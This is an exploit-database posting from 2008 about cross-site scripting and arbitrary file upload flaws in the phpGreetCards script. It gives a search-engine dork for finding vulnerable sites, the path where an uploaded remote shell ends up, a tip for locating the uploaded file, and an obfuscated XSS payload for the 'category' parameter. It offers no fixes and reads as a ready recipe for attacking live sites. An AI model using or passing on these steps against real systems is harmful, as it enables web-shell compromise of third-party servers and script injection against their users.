phpGreetCards - Cross-Site Scripting / Arbitrary File Upload



EKU-ID: 15408 CVE: OSVDB-50989;CVE-2008-6849;OSVDB-50988;CVE-2008-6848 OSVDB-ID:
Author: ahmadbady Published: 2008-12-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards

***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip

***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.

------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************


Author: ahmadbady

**************************************************

# milw0rm.com [2008-12-23]